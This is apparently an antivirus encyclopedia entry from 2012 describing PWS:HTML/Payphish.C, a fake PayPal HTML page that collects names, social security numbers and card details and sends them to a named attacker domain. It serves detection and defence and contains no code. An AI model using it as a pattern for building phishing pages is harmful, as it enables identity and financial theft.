Home / malware PWS:HTML/Payphish.C
First posted on 21 August 2012.
Source: MicrosoftAliases :
PWS:HTML/Payphish.C is also known as PHISH/PayPal.CT.1 (Avira), Trojan-PWS.HTML.Payphish (Ikarus).
Explanation :
PWS:HTML/Payphish.C is an HTML file that imitates the legitimate Paypal website to steal your information.
Installation
You may receive an HTML email message containing this file, or it may be hosted on a website that you go to.
Payload
Steals user information
PWS:HTML/Payphish.C is an HTML website that may appear similar to the following:
Because the HTML webpage looks similar to the legitimate Paypal site, you may unsuspectingly fill out all the information in the page with your account details. If "Save Profile" is clicked, all the information is sent to a remote attacker.
The stolen information may include the following:
- Your full name
- Date of birth
- Social security number if you reside in the US
- Phone number
- Current address
- Credit card information
In the wild, the stolen information has been observed sent to the following website:
psrv1286425620481024cdnbeef.mimesarewelcome.od.ua
Analysis by Jonathan San Jose
Last update 21 August 2012
